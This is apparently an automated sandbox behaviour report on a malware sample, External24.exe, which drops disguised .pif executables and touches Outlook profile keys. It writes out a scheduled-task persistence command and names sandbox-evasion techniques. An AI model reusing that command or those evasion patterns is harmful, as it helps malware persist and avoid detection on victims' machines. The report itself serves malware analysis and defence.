Source: C:\Users\user\Desktop\External24.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: d2d1.dll	Jump to behavior

Source: C:\Users\user\Desktop\External24.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

File written: C:\Windows\SysWOW64\GroupPolicy\gpt.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: External24.exe

Static file information: File size 2479935 > 1048576

Source: External24.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00628AA5 push ecx; ret	15_2_00628AB8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068E86F push edi; ret	21_2_0068E871
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C88B7 push FFFFFF8Bh; iretd	21_2_006C88B9
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068E988 push esi; ret	21_2_0068E98A
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006AEA3E push 00000000h; retn 006Ah	21_2_006AEA4C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00688AA5 push ecx; ret	21_2_00688AB8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068EB63 push esi; ret	21_2_0068EB65
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067CBDD push eax; retf	21_2_0067CBF8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068EC4C push edi; ret	21_2_0068EC4E
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006D72DC push eax; iretd	21_2_006D72DD

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0068577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	15_2_0068577B
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00615EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	15_2_00615EDA
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	21_2_006E577B
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00675EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	21_2_00675EDA

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_006232E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_006232E9

Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Sandbox detection routine: GetCursorPos, DecisionNode, Sleep

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Evasive API call chain: GetPEB, DecisionNodes, Sleep

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\External24.exe	Stalling execution: Execution stalls by calling Sleep			graph_0-3858
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Stalling execution: Execution stalls by calling Sleep

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,

21_2_00BADB00

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	API coverage: 8.7 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 6244	Thread sleep count: 122 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif TID: 2800	Thread sleep time: -30101s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Code function: 21_2_00C949B0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 00C949F1h

21_2_00C949B0

Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,	0_2_00406301
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CC7
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006647B7 GetFileAttributesW,FindFirstFileW,FindClose,	15_2_006647B7
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0066F8A3
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00663E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00663E72
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0066C16C
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066CB81 FindFirstFileW,FindClose,	15_2_0066CB81
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0066CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0066CC0C
